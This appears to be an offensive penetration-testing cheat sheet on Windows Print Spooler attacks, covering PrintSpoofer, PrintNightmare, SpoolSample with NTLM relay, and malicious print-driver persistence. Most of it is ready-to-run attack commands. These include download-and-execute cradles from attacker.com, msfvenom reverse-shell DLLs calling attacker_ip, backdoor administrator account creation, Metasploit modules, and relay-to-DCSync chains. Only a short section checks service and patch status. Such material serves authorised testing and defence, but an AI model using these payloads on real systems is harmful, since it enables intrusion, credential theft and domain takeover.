Print Spooler-related attacks

Understanding Print Spooler Attack Surface

What Makes Print Spooler Exploitable?

The Windows Print Spooler service (spoolsv.exe) runs as SYSTEM by default and has been a consistent source of privilege escalation vulnerabilities. The service's design creates several attack opportunities:

Core Issues:

• Runs as SYSTEM - High-privilege target for escalation

• Named pipe communication - Allows impersonation attacks

• Driver loading functionality - Can load arbitrary DLLs

• Network authentication - Can be forced to authenticate to attackers

• Enabled by default - Present on almost all Windows systems

Attack Categories:

1. Local Privilege Escalation - PrintSpoofer, PrintNightmare local

2. Remote Code Execution - PrintNightmare remote variants

3. Domain Escalation - SpoolSample + NTLM relay attacks

4. Persistence - Malicious print driver installation

PrintSpoofer Attack

Understanding PrintSpoofer

PrintSpoofer exploits the Print Spooler's named pipe communication to perform token impersonation. When the Print Spooler connects to an attacker-controlled named pipe, the attacker can impersonate the SYSTEM token.

Why PrintSpoofer Works:

• Print Spooler creates named pipes for communication

• Attackers can create pipes with predictable names

• When Print Spooler connects, attacker gains SYSTEM token

• Works from service accounts (NetworkService, LocalService)

PrintSpoofer Exploitation

Download and Setup:

# Download PrintSpoofer from GitHub
# https://github.com/itm4n/PrintSpoofer

# Transfer to target system
certutil -urlcache -split -f "http://attacker.com/PrintSpoofer64.exe" PrintSpoofer64.exe

Basic Usage:

# Simple command execution as SYSTEM
PrintSpoofer64.exe -c "whoami"

# Interactive shell as SYSTEM
PrintSpoofer64.exe -i -c cmd

# Execute specific commands
PrintSpoofer64.exe -c "net user hacker Password123! /add"
PrintSpoofer64.exe -c "net localgroup administrators hacker /add"

Advanced Usage:

# Specify custom pipe name
PrintSpoofer64.exe -c "cmd" -n "\\.\pipe\custom_pipe"

# Debug mode for troubleshooting
PrintSpoofer64.exe -d -c "whoami"

# Execute PowerShell commands
PrintSpoofer64.exe -c "powershell -c \"IEX(New-Object Net.WebClient).downloadString('http://attacker.com/shell.ps1')\""

From PowerShell:

# Download and execute in memory
IEX(New-Object Net.WebClient).downloadString('http://attacker.com/Invoke-PrintSpoofer.ps1')
Invoke-PrintSpoofer -Command "whoami"

# File-based execution
Start-Process -FilePath ".\PrintSpoofer64.exe" -ArgumentList "-i -c cmd" -NoNewWindow

PrintNightmare (CVE-2021-34527)

Understanding PrintNightmare

PrintNightmare exploits the Print Spooler's ability to install printer drivers. The vulnerability allows loading of arbitrary DLLs with SYSTEM privileges through the AddPrinterDriverEx API.

Attack Variants:

• Local Exploitation - Load malicious driver DLL locally

• Remote Exploitation - Force remote driver installation

• LPE (Local Privilege Escalation) - Standard local attack

• RCE (Remote Code Execution) - Network-based attack

PrintNightmare Local Exploitation

Using CVE-2021-1675.py:

# Download Cube0x0's PrintNightmare exploit
git clone https://github.com/cube0x0/CVE-2021-1675

# Local exploitation
python3 CVE-2021-1675.py target.domain.com/user:password@192.168.1.10 '\\attacker.com\share\malicious.dll'

# Using authenticated session
python3 CVE-2021-1675.py 'target.domain.com/user:password@192.168.1.10' '\\192.168.1.100\share\nightmare.dll'

Using PrintNightmare.ps1:

# Download PowerShell implementation
# https://github.com/calebstewart/CVE-2021-1675

# Import the script
Import-Module .\CVE-2021-1675.ps1

# Local DLL execution
Invoke-Nightmare -DriverName "Malicious" -NewUser -Username "nightmare" -Password "Password123!"

# Custom DLL path
Invoke-Nightmare -DLL "C:\temp\malicious.dll"

Creating Malicious Driver DLL:

# Generate DLL with msfvenom
msfvenom -p windows/x64/exec CMD="net user nightmare Password123! /add && net localgroup administrators nightmare /add" -f dll -o nightmare.dll

# Host on SMB share
sudo python3 smbserver.py share /tmp/share -smb2support

# Execute PrintNightmare
python3 CVE-2021-1675.py domain.com/user:pass@target '\\attacker_ip\share\nightmare.dll'

PrintNightmare Remote Exploitation

Remote Attack Setup:

# Set up SMB server for DLL hosting
sudo python3 smbserver.py share /tmp/payloads -smb2support -username guest -password ""

# Generate reverse shell DLL
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f dll -o reverse.dll

# Place DLL in share
cp reverse.dll /tmp/payloads/

Execute Remote Attack:

# Remote PrintNightmare execution
python3 CVE-2021-1675.py 'domain.com/user:password@192.168.1.100' '\\attacker_ip\share\reverse.dll'

# With specific driver name
python3 CVE-2021-1675.py 'domain.com/user:password@192.168.1.100' '\\attacker_ip\share\reverse.dll' 'Evil Driver'

Metasploit Module:

# Use Metasploit's PrintNightmare module
use auxiliary/admin/dcerpc/cve_2021_1675_printnightmare
set RHOSTS 192.168.1.100
set SMBUser username
set SMBPass password
set DLL_PATH \\attacker_ip\share\payload.dll
run

SpoolSample Attack

Understanding SpoolSample

SpoolSample forces a domain controller to authenticate to an attacker-controlled machine using the computer account. This authentication can be relayed to other services for domain escalation.

Attack Flow:

1. Use SpoolSample to force DC authentication

2. Capture/relay NTLM authentication

3. Use relayed auth for privilege escalation

4. Gain domain admin or equivalent access

SpoolSample Execution

Basic SpoolSample Usage:

# Download SpoolSample
# https://github.com/leechristensen/SpoolSample

# Force DC to authenticate to attacker machine
SpoolSample.exe DC01.domain.com attacker.domain.com

# Specify custom UNC path
SpoolSample.exe DC01.domain.com \\attacker.domain.com\share

SpoolSample with Responder:

# Terminal 1: Start Responder to capture hashes
sudo python3 Responder.py -I eth0 -rdwv

# Terminal 2: Execute SpoolSample
./SpoolSample.exe DC01.domain.com attacker_ip

# Responder captures DC computer account hash

SpoolSample with ntlmrelayx:

# Set up NTLM relay to target service
python3 ntlmrelayx.py -t ldap://DC01.domain.com -smb2support --escalate-user normaluser

# In another terminal, trigger authentication
./SpoolSample.exe DC01.domain.com attacker_ip

# Relay escalates normaluser to Domain Admin

Advanced SpoolSample Techniques

LDAP Relay for DCSync:

# Relay to LDAP for DCSync rights
python3 ntlmrelayx.py -t ldap://DC01.domain.com -smb2support --delegate-access

# Trigger SpoolSample
./SpoolSample.exe DC01.domain.com attacker_ip

# Use delegation for DCSync
python3 secretsdump.py -just-dc domain.com/DELEGATED_USER@DC01.domain.com -k -no-pass

HTTP Relay Attack:

# Relay to Exchange/ADCS HTTP services
python3 ntlmrelayx.py -t http://exchange.domain.com/owa -smb2support

# Force authentication via SpoolSample
./SpoolSample.exe DC01.domain.com attacker_ip

Multiple Target Relay:

# Create target list
echo "192.168.1.10" > targets.txt
echo "192.168.1.20" >> targets.txt

# Relay to multiple targets
python3 ntlmrelayx.py -tf targets.txt -smb2support

# Trigger authentication
./SpoolSample.exe DC01.domain.com attacker_ip

Malicious Print Driver Installation

Understanding Driver-Based Persistence

Print drivers run with SYSTEM privileges and load at system startup. Installing malicious print drivers provides persistent SYSTEM access.

Driver Installation Techniques

Using PrintNightmare for Persistence:

# Create persistent backdoor DLL
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=443 -f dll -o persistent.dll

# Install as print driver
Invoke-Nightmare -DLL "\\attacker_ip\share\persistent.dll" -DriverName "Legitimate Driver"

# Driver loads on system startup

Manual Driver Installation:

# Add printer driver manually (requires admin)
rundll32 printui.dll,PrintUIEntry /ia /c\\attacker_ip\share /m "Malicious Driver" /h "x64" /v 3 /f "\\attacker_ip\share\malicious.dll"

# Verify installation
wmic printer get name,drivername

# Remove driver (cleanup)
rundll32 printui.dll,PrintUIEntry /dd /m "Malicious Driver"

PowerShell Driver Management:

# List installed print drivers
Get-PrinterDriver

# Add malicious driver
Add-PrinterDriver -Name "Backdoor Driver" -InfPath "\\attacker_ip\share\malicious.inf"

# Remove driver
Remove-PrinterDriver -Name "Backdoor Driver"

Print Spooler Enumeration

Service Status Check

Basic Enumeration:

# Check if Print Spooler is running
sc query spooler

# Get detailed service information
sc qc spooler

# Check service permissions
sc sdshow spooler

PowerShell Enumeration:

# Check Print Spooler service
Get-Service -Name Spooler

# Get print spooler process details
Get-Process -Name spoolsv

# Check if PrintNightmare is patched
Get-HotFix | Where-Object {$_.HotFixID -eq "KB5005010" -or $_.HotFixID -eq "KB5005652"}

Remote Enumeration:

# Check if Print Spooler is accessible remotely
nmap -p 445 --script smb-enum-services target_ip

# Check for MS-RPRN RPC interface
rpcdump.py target_ip | grep -i spool

# Impacket's rpcmap
python3 rpcmap.py 'domain.com/user:password@target_ip' -brute-force

Patch Status Verification

Check PrintNightmare Patches:

# Key patches for PrintNightmare
wmic qfe where "HotFixID='KB5005010'" get HotFixID,InstalledOn
wmic qfe where "HotFixID='KB5005652'" get HotFixID,InstalledOn
wmic qfe where "HotFixID='KB5005565'" get HotFixID,InstalledOn

# Registry check for Point and Print restrictions
reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint"

PowerShell Patch Check:

# Check for PrintNightmare patches
$patches = @("KB5005010", "KB5005652", "KB5005565", "KB5005613", "KB5006670")
foreach ($patch in $patches) {
    Get-HotFix -Id $patch -ErrorAction SilentlyContinue | Select-Object HotFixID, InstalledOn
}

# Check Point and Print settings
Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint" -ErrorAction SilentlyContinue

Tool Integration and Automation

Metasploit Integration

PrintNightmare Module:

# Local PrintNightmare
use exploit/windows/local/cve_2021_1675_printnightmare
set SESSION 1
set DLL_PATH \\attacker_ip\share\payload.dll
run

# Remote PrintNightmare
use auxiliary/admin/dcerpc/cve_2021_1675_printnightmare
set RHOSTS target_ip
set SMBUser username
set SMBPass password
run

PrintSpoofer Integration:

# Upload PrintSpoofer via Meterpreter
meterpreter > upload /opt/PrintSpoofer64.exe C:\\temp\\

# Execute for privilege escalation
meterpreter > execute -f "C:\\temp\\PrintSpoofer64.exe" -a "-i -c cmd"

# Migrate to SYSTEM process
meterpreter > migrate -P

Attack Scenarios and Chaining

Scenario 1: Service Account to SYSTEM

Initial Access: Service account (NetworkService, LocalService) Target: Local SYSTEM privileges

# Verify current context
whoami
whoami /priv

# Execute PrintSpoofer
PrintSpoofer64.exe -i -c cmd

# Verify escalation
whoami
# Should show: nt authority\system

Scenario 2: Domain Controller Compromise

Initial Access: Domain user account Target: Domain Admin privileges

# Step 1: Set up NTLM relay
python3 ntlmrelayx.py -t ldap://DC01.domain.com -smb2support --escalate-user domain_user

# Step 2: Force DC authentication
./SpoolSample.exe DC01.domain.com attacker_ip

# Step 3: Verify escalation
python3 secretsdump.py domain.com/domain_user@DC01.domain.com -just-dc

Scenario 3: Remote Code Execution

Initial Access: Network access to target Target: Code execution as SYSTEM

# Step 1: Generate payload DLL
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f dll -o rce.dll

# Step 2: Host payload
sudo python3 smbserver.py share /tmp -smb2support

# Step 3: Execute PrintNightmare
python3 CVE-2021-1675.py 'domain.com/user:password@target_ip' '\\attacker_ip\share\rce.dll'

Scenario 4: Lateral Movement

Use SpoolSample for lateral movement across domain:

# Enumerate domain controllers
nslookup -type=SRV _ldap._tcp.dc._msdcs.domain.com

# Target each DC with SpoolSample
./SpoolSample.exe DC01.domain.com attacker_ip
./SpoolSample.exe DC02.domain.com attacker_ip

# Relay captured authentication for lateral access

Operational Notes

PrintSpoofer Requirements:

• Service account context (NetworkService, LocalService, or similar)

• Print Spooler service running (default)

• Named pipe creation permissions

PrintNightmare Requirements:

• Valid domain credentials (any domain user)

• Network access to target system

• Print Spooler service running

• Ability to host malicious DLL

SpoolSample Requirements:

• Domain user credentials

• Network access to domain controller

• MS-RPRN RPC interface accessible

• Target must have Print Spooler enabled

Success Indicators:

• PrintSpoofer: Command prompt shows "nt authority\system"

• PrintNightmare: Payload DLL executes with SYSTEM privileges

• SpoolSample: Authentication captured in relay tool

• Driver Installation: Driver appears in system driver list

Print Spooler attacks remain one of the most reliable privilege escalation vectors in modern Windows environments, with multiple techniques applicable across different scenarios from local escalation to domain compromise.